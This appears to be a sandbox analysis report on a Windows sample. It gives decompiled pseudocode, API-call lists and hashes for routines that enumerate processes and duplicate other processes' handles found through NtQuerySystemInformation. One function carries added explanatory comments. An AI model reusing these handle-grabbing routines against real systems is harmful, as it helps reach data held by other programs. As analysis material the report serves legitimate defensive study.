• Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: ExceptionException@8RaiseThrowstd::bad_exception::bad_exception
• String ID: vector<T> too long
• API String ID: 1843230569-3788999226
• Opcode ID: 30c3e472621d2f35f9e79f67c1309a68cdc690ade9fbe975f390bb3dee004a40
• Instruction ID: ab61ff5c852f7bd7f9835bcfe6148f720b34d9498a962a2989811ffb75aa1c5c
• Opcode Fuzzy Hash: 30c3e472621d2f35f9e79f67c1309a68cdc690ade9fbe975f390bb3dee004a40
• Instruction Fuzzy Hash: 9BF05875804688EBDB14DBD4DD81BDEB778FB047A0F900728F522676C4DB342A04CB80
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 76%
E1000442C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
    intOrPtr* _t20;
    intOrPtr* _t23;
    void* _t25;
    void* _t26;
    void* _t27;

    _t27 = __eflags;
    _push(0x44);
    E1000F00B(E10022968, __ebx, __edi, __esi);
    E10001160(_t25 - 0x28, _t27, "invalid string position");
    _t2 = _t25 - 4;
     *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
    _t20 = _t25 - 0x50;
    E10001D90(_t20,  *_t2, _t25 - 0x28);
     *((intOrPtr*)(_t25 - 0x50)) = 0x100232c8;
    E1000EBEB(_t25 - 0x50, 0x10330168);
    asm("int3");
    _push(__esi);
    _t23 = _t20;
    E10001EF0(_t20,  *((intOrPtr*)(_t26 + 8)));
     *_t23 = 0x100232c8;
    return _t23;
}
APIs
• __EH_prolog3.LIBCMT ref: 10004433
• __CxxThrowException@8.LIBCMT ref: 10004465
  • Part of subcall function 1000EBEB: RaiseException.KERNEL32(?,?,1000CC92,100019C3,?,?,?,?,1000CC92,100019C3,10330760,103332E0), ref: 1000EC2B
  • Part of subcall function 10001EF0: std::exception::exception.LIBCMT ref: 10001F13
Strings
• invalid string position, xrefs: 10004438
Memory Dump Source
• Source File: 00000004.00000002.389655641.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000004.00000002.389597489.0000000010000000.00000004.00000001.sdmp
• Associated: 00000004.00000002.389720562.0000000010023000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390103749.0000000010332000.00000004.00000001.sdmp
• Associated: 00000004.00000002.390114476.0000000010337000.00000002.00000001.sdmp
• Associated: 00000004.00000002.390121768.0000000010338000.00000004.00000001.sdmp
Similarity
• API ID: ExceptionException@8H_prolog3RaiseThrowstd::exception::exception
• String ID: invalid string position
• API String ID: 2977319401-1799206989
• Opcode ID: 517e03da3c5cc15a0561414186fff577991a24e91ecfc2b458e1a1a669852aa6
• Instruction ID: 183d1e3e387516a94398dfdb2ceda930dac9fd17066dab5377ceff19e0cdabbb
• Opcode Fuzzy Hash: 517e03da3c5cc15a0561414186fff577991a24e91ecfc2b458e1a1a669852aa6
• Instruction Fuzzy Hash: BEE09275800158EBD710DBD4EC41ADFB778EF04390F80891AF645B710ACBB5A948CB60
Uniqueness

Uniqueness Score: -1.00%

Executed Functions

C-Code - Quality: 93%
E0040CE93(void* __edx, void* __eflags, intOrPtr _a4) {
    void* _v8;
    void* _v12;
    char _v16;
    char _v24;
    char _v32;
    char _v40;
    char _v48;
    intOrPtr _v52;
    char _v576;
    long _v580;
    void _v1102;
    void* _v1104;
    intOrPtr _v1636;
    long _v1652;
    void _v1656;
    void* _v1660;
    void* __edi;
    void* __esi;
    void* _t42;
    int _t47;
    long _t50;
    void* _t51;
    void* _t57;
    struct HINSTANCE__* _t69;
    void* _t71;
    void* _t72;
    intOrPtr _t79;
    void* _t84;
    void* _t85;
    void* _t86;

    _t79 = _a4;
    _t2 = _t79 + 0x2c; // 0x40c800
    E00403F55(_t2);
    _t42 = CreateToolhelp32Snapshot(2, 0); // executed
    _v12 = _t42;
    memset( &_v1656, 0, 0x228);
    _t85 = _t84 + 0xc;
    _v1660 = 0x22c;
    Process32FirstW(_v12,  &_v1660); // executed
    while(1) {
        _t47 = Process32NextW(_v12,  &_v1660); // executed
        if(_t47 == 0) {
            break;
        }
        E0040C997( &_v580);
        _t50 = _v1652;
        _v580 = _t50;
        _v52 = _v1636;
        _t51 = OpenProcess(0x410, 0, _t50);
        __eflags = _t51;
        _v8 = _t51;
        if(_t51 != 0) {
            L4:
            _v1104 = 0;
            memset( &_v1102, 0, 0x208);
            _t86 = _t85 + 0xc;
            E0040D049(_t79, _v8,  &_v1104);
            __eflags = _v1104;
            if(_v1104 == 0) {
                L6:
                __eflags =  *0x4136ec; // 0x1
                _v16 = 0x104;
                if(__eflags == 0) {
                    _t69 = GetModuleHandleW(L"kernel32.dll");
                    __eflags = _t69;
                    if(_t69 != 0) {
                         *0x4136ec = 1;
                         *0x4136f0 = GetProcAddress(_t69, "QueryFullProcessImageNameW");
                    }
                }
                _t57 =  *0x4136f0;
                                                                                                                                                							__eflags = _t57;
                                                                                                                                                							if(_t57 != 0) {
                                                                                                                                                								 *_t57(_v8, 0,  &_v1104,  &_v16); // executed
                                                                                                                                                							}
                                                                                                                                                							L11:
                                                                                                                                                							E0040CAF2( &_v576,  &_v1104);
                                                                                                                                                							E0040CE3D(_v8,  &_v48,  &_v40,  &_v32,  &_v24); // executed
                                                                                                                                                							_t85 = _t86 + 0x14;
                                                                                                                                                							CloseHandle(_v8);
                                                                                                                                                							_t79 = _a4;
                                                                                                                                                							L12:
                                                                                                                                                							_t37 = _t79 + 0x2c; // 0x40c800
                                                                                                                                                							E0040D0D3(_t37,  &_v580);
                                                                                                                                                							continue;
                                                                                                                                                						}
                                                                                                                                                						__eflags = _v1104 - 0x3f;
                                                                                                                                                						if(_v1104 != 0x3f) {
                                                                                                                                                							goto L11;
                                                                                                                                                						}
                                                                                                                                                						goto L6;
                                                                                                                                                					}
                                                                                                                                                					_t71 = E004058FB();
                                                                                                                                                					__eflags =  *((intOrPtr*)(_t71 + 4)) - 5;
                                                                                                                                                					if( *((intOrPtr*)(_t71 + 4)) <= 5) {
                                                                                                                                                						goto L12;
                                                                                                                                                					}
                                                                                                                                                					_t72 = OpenProcess(0x1000, 0, _v580);
                                                                                                                                                					__eflags = _t72;
                                                                                                                                                					_v8 = _t72;
                                                                                                                                                					if(_t72 == 0) {
                                                                                                                                                						goto L12;
                                                                                                                                                					}
                                                                                                                                                					goto L4;
                                                                                                                                                				}
                                                                                                                                                				return CloseHandle(_v12);
                                                                                                                                                			}

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00403F55: free.MSVCRT(00000000,0040BC79,?,00000000,0040C0A1,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0040E23C,00000000), ref: 00403F5C
                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040CEAF
                                                                                                                                                • memset.MSVCRT ref: 0040CEC4
                                                                                                                                                • Process32FirstW.KERNEL32(0040C7D4,?), ref: 0040CEE0
                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,00000000), ref: 0040CF17
                                                                                                                                                • OpenProcess.KERNEL32(00001000,00000000,?), ref: 0040CF3B
                                                                                                                                                • memset.MSVCRT ref: 0040CF5C
                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,?), ref: 0040CF9C
                                                                                                                                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 0040CFB6
                                                                                                                                                • QueryFullProcessImageNameW.KERNELBASE(?,00000000,?,00000104,?,?), ref: 0040CFD9
                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 0040D00A
                                                                                                                                                • Process32NextW.KERNEL32(0040C7D4,0000022C), ref: 0040D02C
                                                                                                                                                • CloseHandle.KERNEL32(0040C7D4,0040C7D4,0000022C,?,?,?,?,?,?), ref: 0040D03C
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: HandleProcess$CloseOpenProcess32memset$AddressCreateFirstFullImageModuleNameNextProcQuerySnapshotToolhelp32free
                                                                                                                                                • String ID: ?$QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                • API String ID: 239888749-1549906504
                                                                                                                                                • Opcode ID: a67616895fe0c6f4d5707a018e44a4349539395186fc148ddabec6c2531af6f9
                                                                                                                                                • Instruction ID: b0c56ac076400066d7f85ee915419da0325970425bfee0af64f00aa3922c561f
                                                                                                                                                • Opcode Fuzzy Hash: a67616895fe0c6f4d5707a018e44a4349539395186fc148ddabec6c2531af6f9
                                                                                                                                                • Instruction Fuzzy Hash: E2413DB1D00119EEDF20DFA1DC85ADEB7B9EB04308F0041BAE609B2191D7755F998F99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 91%
                                                                                                                                                			E0040C6FB(void*** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, long* _a12, signed int* _a16) {
                                                                                                                                                				void* _v8;
                                                                                                                                                				void* _v12;
                                                                                                                                                				void* _v16;
                                                                                                                                                				int _v20;
                                                                                                                                                				int _v24;
                                                                                                                                                				int _v28;
                                                                                                                                                				int _v32;
                                                                                                                                                				char _v36;
                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                				int _v44;
                                                                                                                                                				intOrPtr _v48;
                                                                                                                                                				int _v52;
                                                                                                                                                				char _v56;
                                                                                                                                                				int _v60;
                                                                                                                                                				intOrPtr _v64;
                                                                                                                                                				int _v68;
                                                                                                                                                				char _v72;
                                                                                                                                                				int _v76;
                                                                                                                                                				int _v80;
                                                                                                                                                				int _v84;
                                                                                                                                                				int _v88;
                                                                                                                                                				int _v92;
                                                                                                                                                				int _v96;
                                                                                                                                                				int _v100;
                                                                                                                                                				void _v622;
                                                                                                                                                				short _v624;
                                                                                                                                                				char _v1616;
                                                                                                                                                				void _v1623;
                                                                                                                                                				char _v1624;
                                                                                                                                                				void* __esi;
                                                                                                                                                				void* _t97;
                                                                                                                                                				void* _t99;
                                                                                                                                                				long _t101;
                                                                                                                                                				intOrPtr _t102;
                                                                                                                                                				void* _t110;
                                                                                                                                                				void* _t111;
                                                                                                                                                				void* _t114;
                                                                                                                                                				void* _t116;
                                                                                                                                                				void* _t128;
                                                                                                                                                				void* _t131;
                                                                                                                                                				signed char* _t152;
                                                                                                                                                				void* _t153;
                                                                                                                                                				void** _t154;
                                                                                                                                                				void*** _t155;
                                                                                                                                                				intOrPtr _t158;
                                                                                                                                                				signed short* _t159;
                                                                                                                                                				void* _t163;
                                                                                                                                                				void* _t164;
                                                                                                                                                				void* _t165;
                                                                                                                                                
                                                                                                                                                				_t165 = __eflags;
                                                                                                                                                				_t155 = __eax;
                                                                                                                                                				_v28 = 0;
                                                                                                                                                				_v32 = 0;
                                                                                                                                                				_v624 = 0;
                                                                                                                                                				memset( &_v622, 0, 0x208);
                                                                                                                                                				E00405800( &_v624);
                                                                                                                                                				_t164 = _t163 + 0x10;
                                                                                                                                                				_t97 = CreateFileW( &_v624, 0x80000000, 3, 0, 3, 0, 0); // executed
                                                                                                                                                				_v12 = _t97;
                                                                                                                                                				_t99 = E0040C572(_t155, _t165); // executed
                                                                                                                                                				_v16 = _t99;
                                                                                                                                                				FindCloseChangeNotification(_v12); // executed
                                                                                                                                                				_t154 =  *_t155;
                                                                                                                                                				_t101 = GetCurrentProcessId();
                                                                                                                                                				if(_v16 == 0) {
                                                                                                                                                					_t153 =  *_t154;
                                                                                                                                                					if(_t153 > 0) {
                                                                                                                                                						_t152 =  &(_t154[2]);
                                                                                                                                                						do {
                                                                                                                                                							if(( *(_t152 - 4) & 0x0000ffff) == _t101 && (_t152[2] & 0x0000ffff) == _v12) {
                                                                                                                                                								_v32 =  *_t152 & 0x000000ff;
                                                                                                                                                							}
                                                                                                                                                							_t152 =  &(_t152[0x10]);
                                                                                                                                                							_t153 = _t153 - 1;
                                                                                                                                                							_t170 = _t153;
                                                                                                                                                						} while (_t153 != 0);
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				_t102 = 0x20;
                                                                                                                                                				_v64 = _t102;
                                                                                                                                                				_v48 = _t102;
                                                                                                                                                				_v72 = 0;
                                                                                                                                                				_v60 = 0;
                                                                                                                                                				_v68 = 0;
                                                                                                                                                				_v56 = 0;
                                                                                                                                                				_v44 = 0;
                                                                                                                                                				_v52 = 0;
                                                                                                                                                				_v100 = 0;
                                                                                                                                                				_v96 = 0;
                                                                                                                                                				_v92 = 0;
                                                                                                                                                				_v88 = 0;
                                                                                                                                                				_v84 = 0;
                                                                                                                                                				_v80 = 0;
                                                                                                                                                				_v76 = 0;
                                                                                                                                                				E0040CE93(_t153, _t170,  &_v100); // executed
                                                                                                                                                				_v20 = 0;
                                                                                                                                                				if(_v44 > 0) {
                                                                                                                                                					do {
                                                                                                                                                						_t110 = E0040C982(_v20,  &_v56);
                                                                                                                                                						_t36 = _t110 + 4; // 0x4
                                                                                                                                                						_v12 = _t110;
                                                                                                                                                						_t111 = E00405888(_t36);
                                                                                                                                                						_t158 = _a4;
                                                                                                                                                						_v16 = _t111;
                                                                                                                                                						_v8 = 0;
                                                                                                                                                						if( *((intOrPtr*)(_t158 + 0x1c)) <= 0) {
                                                                                                                                                							goto L26;
                                                                                                                                                						} else {
                                                                                                                                                							while(1) {
                                                                                                                                                								_t114 = E00406306(_t158, _v8);
                                                                                                                                                								_push(_v16);
                                                                                                                                                								_push(_t114);
                                                                                                                                                								L0040E03E();
                                                                                                                                                								if(_t114 == 0) {
                                                                                                                                                									break;
                                                                                                                                                								}
                                                                                                                                                								_v8 = _v8 + 1;
                                                                                                                                                								if(_v8 <  *((intOrPtr*)(_t158 + 0x1c))) {
                                                                                                                                                									continue;
                                                                                                                                                								} else {
                                                                                                                                                									goto L26;
                                                                                                                                                								}
                                                                                                                                                								goto L27;
                                                                                                                                                							}
                                                                                                                                                							_t116 = OpenProcess(0x40, 0,  *_v12);
                                                                                                                                                							__eflags = _t116;
                                                                                                                                                							_v16 = _t116;
                                                                                                                                                							if(_t116 != 0) {
                                                                                                                                                								__eflags =  *_t154;
                                                                                                                                                								_v24 = 0;
                                                                                                                                                								if( *_t154 > 0) {
                                                                                                                                                									_t159 =  &(_t154[1]);
                                                                                                                                                									do {
                                                                                                                                                										__eflags = ( *_t159 & 0x0000ffff) -  *_v12;
                                                                                                                                                										if(( *_t159 & 0x0000ffff) !=  *_v12) {
                                                                                                                                                											goto L21;
                                                                                                                                                										} else {
                                                                                                                                                											__eflags = (_t159[2] & 0x000000ff) - _v32;
                                                                                                                                                											if((_t159[2] & 0x000000ff) != _v32) {
                                                                                                                                                												goto L21;
                                                                                                                                                											} else {
                                                                                                                                                												_v8 = 0;
                                                                                                                                                												DuplicateHandle(_v16, _t159[3] & 0x0000ffff, GetCurrentProcess(),  &_v8, 0x80000000, 0, 2); // executed
                                                                                                                                                												__eflags = _v8;
                                                                                                                                                												if(_v8 == 0) {
                                                                                                                                                													goto L21;
                                                                                                                                                												} else {
                                                                                                                                                													_v1624 = 0;
                                                                                                                                                													memset( &_v1623, 0, 0x3e7);
                                                                                                                                                													_t164 = _t164 + 0xc;
                                                                                                                                                													_v36 = 0;
                                                                                                                                                													E0040C41D();
                                                                                                                                                													_t128 =  *0x4132a8;
                                                                                                                                                													__eflags = _t128;
                                                                                                                                                													if(_t128 != 0) {
                                                                                                                                                														 *_t128(_v8, 1,  &_v1624, 0x3e4,  &_v36);
                                                                                                                                                													}
                                                                                                                                                													CloseHandle(_v8);
                                                                                                                                                													_v40 = E00405888( &_v1616);
                                                                                                                                                													_t131 = E00405888(_a8);
                                                                                                                                                													_push(_t131);
                                                                                                                                                													_push(_v40);
                                                                                                                                                													L0040E03E();
                                                                                                                                                													__eflags = _t131;
                                                                                                                                                													if(_t131 == 0) {
                                                                                                                                                														 *_a12 =  *_v12;
                                                                                                                                                														_v28 = 1;
                                                                                                                                                														 *_a16 = _t159[3] & 0x0000ffff;
                                                                                                                                                													} else {
                                                                                                                                                														goto L21;
                                                                                                                                                													}
                                                                                                                                                												}
                                                                                                                                                											}
                                                                                                                                                										}
                                                                                                                                                										goto L24;
                                                                                                                                                										L21:
                                                                                                                                                										_v24 = _v24 + 1;
                                                                                                                                                										_t159 =  &(_t159[8]);
                                                                                                                                                										__eflags = _v24 -  *_t154;
                                                                                                                                                									} while (_v24 <  *_t154);
                                                                                                                                                								}
                                                                                                                                                								L24:
                                                                                                                                                								CloseHandle(_v16);
                                                                                                                                                							}
                                                                                                                                                							__eflags = _v28;
                                                                                                                                                							if(_v28 == 0) {
                                                                                                                                                								goto L26;
                                                                                                                                                							}
                                                                                                                                                						}
                                                                                                                                                						goto L27;
                                                                                                                                                						L26:
                                                                                                                                                						_v20 = _v20 + 1;
                                                                                                                                                					} while (_v20 < _v44);
                                                                                                                                                				}
                                                                                                                                                				L27:
                                                                                                                                                				if(_v100 != 0) {
                                                                                                                                                					FreeLibrary(_v100); // executed
                                                                                                                                                					_v100 = 0;
                                                                                                                                                				}
                                                                                                                                                				E00403F55( &_v56);
                                                                                                                                                				E00403F55( &_v72);
                                                                                                                                                				return _v28;
                                                                                                                                                			}
                                                                                                                                                0x0040c6fb
                                                                                                                                                0x0040c70e
                                                                                                                                                0x0040c718
                                                                                                                                                0x0040c71b
                                                                                                                                                0x0040c71e
                                                                                                                                                0x0040c725
                                                                                                                                                0x0040c731
                                                                                                                                                0x0040c736
                                                                                                                                                0x0040c74c

APIs
• memset.MSVCRT ref: 0040C725
  • Part of subcall function 00405800: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,004073D6,00000000,00407289,?,00000000,00000208,?), ref: 0040580B
• CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,00000000), ref: 0040C74C
• FindCloseChangeNotification.KERNELBASE(?,?,?,?,00000000), ref: 0040C762
• GetCurrentProcessId.KERNEL32(?,?,?,00000000), ref: 0040C76A
• _wcsicmp.MSVCRT ref: 0040C816
• OpenProcess.KERNEL32(00000040,00000000,?,?,?,?,?,00000000), ref: 0040C839
• GetCurrentProcess.KERNEL32(?,80000000,00000000,00000002,?,?,?,00000000), ref: 0040C882
• DuplicateHandle.KERNELBASE(00000000,?,00000000,?,?,?,00000000), ref: 0040C891
• memset.MSVCRT ref: 0040C8AF
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,00000000), ref: 0040C8E2
• _wcsicmp.MSVCRT ref: 0040C902
• CloseHandle.KERNEL32(00000000,?,?,?,00000000), ref: 0040C93D
• FreeLibrary.KERNELBASE(?,?,?,?,?,00000000), ref: 0040C95F
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: CloseHandleProcess$CurrentFile_wcsicmpmemset$ChangeCreateDuplicateFindFreeLibraryModuleNameNotificationOpen
• String ID:
• API String ID: 832456665-0
• Opcode ID: 112fab85cbf0c6bef0d13e6ff02aaec31bd4d1831785e58f41808b8cf733c709
• Instruction ID: de6e42d4d0ab8c6b3742c2937cd5abb5ca9b3ab329c089935e202bb2c8060a11
• Opcode Fuzzy Hash: 112fab85cbf0c6bef0d13e6ff02aaec31bd4d1831785e58f41808b8cf733c709
• Instruction Fuzzy Hash: 6A81F2B1C00219EFDB10EFA5C9859AEBBB5FB08305F6085BAE905B7291D7385E44CF58
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
			E0040C516(signed int* __eax, void* _a4, long _a8, long* _a12) {
				signed int _t5;
				long _t7;

				// __eax points at a stored value, most likely the dynamically resolved
				// ntdll export; if it is still zero the call cannot be made.
				_t5 =  *__eax;
				if(_t5 == 0) {
					return _t5 | 0xffffffff; // -1: function pointer not resolved
				}
				// 0x10 = SystemHandleInformation: returns the table of every open handle
				// on the system, which the caller at 0040C5A6 then walks (see the
				// OpenProcess / DuplicateHandle / _wcsicmp calls listed above).
				_t7 = NtQuerySystemInformation(0x10, _a4, _a8, _a12); // executed
				return _t7;
			}






APIs
• NtQuerySystemInformation.NTDLL(00000010,?,?,?,0040C5A6,00000000,00001000,00000000,?,?,00000000), ref: 0040C52A
Memory Dump Source
• Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
• Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
• Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
Similarity
• API ID: InformationQuerySystem
• String ID:
• API String ID: 3562636166-0
• Opcode ID: 738e521c8b0e2f7fb8dbff4b4999eafe421484fd9be088d8b3f21b89483e91da
• Instruction ID: c4ee8ba0ae0e5c888482442c657d74a2bffdce45b5391c025a143593a4db9a10
• Opcode Fuzzy Hash: 738e521c8b0e2f7fb8dbff4b4999eafe421484fd9be088d8b3f21b89483e91da
• Instruction Fuzzy Hash: 16C0123D108200FEDA014BA08C40E0FB791AF89770F14CB19B174900E0C2B1D020A722
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 91%
E0040BE98(void* __ecx, void* __edx, void* __eflags, intOrPtr _a12, char _a24, struct HWND__* _a28, struct HWND__* _a32, intOrPtr _a36, struct HWND__* _a40, struct tagMSG _a44, char _a72, char _a76, struct HWND__* _a592, struct HACCEL__* _a616, intOrPtr _a664, intOrPtr _a1792, char* _a1800, struct HWND__* _a1820) {
	char _v4;
	char _v8;
	struct HWND__* _v12;
	void* __edi;
	void* __esi;
	void* _t42;
	struct HWND__* _t53;
	void* _t60;
	struct HWND__* _t69;
	struct HWND__* _t71;
	struct HWND__* _t76;
	int _t82;
	int _t84;
	struct HWND__* _t85;
	void* _t93;
	struct HWND__* _t107;
	struct HWND__* _t108;

	_t93 = __edx;
	_t92 = __ecx;
	E0040E340(0x27a4, __ecx);
	_t42 = E00402754(_t92);
	if(_t42 != 0) {
		E0040DA9D();
		SetErrorMode(0x8001); // executed
		 *0x412b10 = 0x11223344;
		EnumResourceTypesW(GetModuleHandleW(0), E0040DA82, 0); // executed
		E0040621C( &_v4);
		_push( &_a76);
		_a36 = 0x20;
		_a28 = 0;
		_a40 = 0;
		_a32 = 0;
		_a44.hwnd = 0;
		E0040BB15(__eflags);
		_a1800 =  &_v8;
		E004064A1(_t92, __eflags,  &_v8, _a12); // executed
		_t53 = E004065C4(_a1792, L"/savelangfile");
		__eflags = _t53;
		if(_t53 < 0) {
			E00407259(); // executed
			__eflags = E004065C4(_a1800, L"/deleteregkey");
			if(__eflags < 0) {
				__eflags =  *((intOrPtr*)(_a1800 + 0x30)) - 1;
				if(__eflags <= 0) {
					L7:
					E0040BA94( &_a72);
					__eflags = _a664 - 3;
					if(_a664 != 3) {
						_push(5);
					} else {
						_push(3);
					}
					ShowWindow(_a592, ??);
					UpdateWindow(_a592);
					_a616 = LoadAcceleratorsW(GetModuleHandleW(0), 0x67);
					__eflags = GetMessageW( &_a44, 0, 0, 0);
					while(__eflags != 0) {
						_t69 =  *0x412c2c; // 0x0
						__eflags = _t69;
						_t107 = _t69;
						if(_t69 == 0) {
							L14:
							_t71 = TranslateAcceleratorW(_a592, _a616,  &_a44);
							__eflags = _t71;
							if(_t71 == 0) {
								goto L15;
							}
						} else {
							_t85 = GetForegroundWindow();
							__eflags = _t107 - _t85;
							if(_t107 == _t85) {
								L15:
								_t108 =  *0x412c2c; // 0x0
								_v12 = _a1820;
								_t76 = IsDialogMessageW(_a592,  &_a44);
								__eflags = _t76;
								if(_t76 == 0) {
									__eflags = _t108;
									if(_t108 == 0) {
										L18:
										__eflags = _v12;
										if(_v12 == 0) {
											L20:
											TranslateMessage( &_a44);
											DispatchMessageW( &_a44);
										} else {
											_t82 = IsDialogMessageW(_v12,  &_a44);
											__eflags = _t82;
											if(_t82 == 0) {
												goto L20;
											}
										}
									} else {
										_t84 = IsDialogMessageW(_t108,  &_a44);
										__eflags = _t84;
										if(_t84 == 0) {
											goto L18;
										}
									}
								}
							} else {
								goto L14;
							}
						}
						__eflags = GetMessageW( &_a44, 0, 0, 0);
					}
				} else {
					__eflags = E0040BD40( &_a72, _t93, __eflags);
					if(__eflags == 0) {
						goto L7;
					}
				}
			}
		} else {
			 *0x4131d0 = 0x412374;
			E004073F7(_t92);
		}
		E0040BC51( &_a72, __eflags);
		E0040623E( &_v8);
		E00403F55( &_a24);
		E0040623E( &_v8);
		_t60 = 0;
		__eflags = 0;
	} else {
		_t60 = _t42 + 1;
	}
	return _t60;
}
                                                                                                                                                0x0040c071
                                                                                                                                                0x0040c07c
                                                                                                                                                0x0040c05d
                                                                                                                                                0x0040c066
                                                                                                                                                0x0040c068
                                                                                                                                                0x0040c06a
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040c06a
                                                                                                                                                0x0040c04b
                                                                                                                                                0x0040c051
                                                                                                                                                0x0040c053
                                                                                                                                                0x0040c055
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040c055
                                                                                                                                                0x0040c049
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040c005
                                                                                                                                                0x0040c090
                                                                                                                                                0x0040c090
                                                                                                                                                0x0040bf7f
                                                                                                                                                0x0040bf88
                                                                                                                                                0x0040bf8a
                                                                                                                                                0x00000000
                                                                                                                                                0x00000000
                                                                                                                                                0x0040bf8a
                                                                                                                                                0x0040bf7d
                                                                                                                                                0x0040bf40
                                                                                                                                                0x0040bf40
                                                                                                                                                0x0040bf4a
                                                                                                                                                0x0040bf4a
                                                                                                                                                0x0040c09c
                                                                                                                                                0x0040c0a5
                                                                                                                                                0x0040c0ae
                                                                                                                                                0x0040c0b7
                                                                                                                                                0x0040c0bc
                                                                                                                                                0x0040c0bc
                                                                                                                                                0x0040beb4
                                                                                                                                                0x0040beb4
                                                                                                                                                0x0040beb4
                                                                                                                                                0x0040c0c4

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 00402754: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402773
                                                                                                                                                  • Part of subcall function 00402754: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00402785
                                                                                                                                                  • Part of subcall function 00402754: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040BEB0,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 00402799
                                                                                                                                                  • Part of subcall function 00402754: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004027C4
                                                                                                                                                • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040BEC4
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,0040DA82,00000000,?,00000002,?,0040E23C,00000000,?,0000000A), ref: 0040BEE3
                                                                                                                                                • EnumResourceTypesW.KERNEL32 ref: 0040BEE6
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000B.00000002.283098075.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                • Associated: 0000000B.00000002.283081223.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283119930.000000000040F000.00000002.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283125537.0000000000412000.00000004.00020000.sdmp
                                                                                                                                                • Associated: 0000000B.00000002.283131645.0000000000414000.00000002.00020000.sdmp
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                                                                • String ID: $/deleteregkey$/savelangfile
                                                                                                                                                • API String ID: 2744995895-28296030
                                                                                                                                                • Opcode ID: 16670ade8d057f9152663538c6d4224641cd9f1f9fcff8b2ffb5104e2a31c215
                                                                                                                                                • Instruction ID: 7c11083c69c625fd9a2f21e20e1dcd1dda6225a88cbd83bdad8d2a1ddbeb11aa
                                                                                                                                                • Opcode Fuzzy Hash: 16670ade8d057f9152663538c6d4224641cd9f1f9fcff8b2ffb5104e2a31c215
                                                                                                                                                • Instruction Fuzzy Hash: E2516C71508345EBD720AFA1DD8895FB7E8FB84304F40493EFA85E3191DB39E8088B5A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                C-Code - Quality: 100%
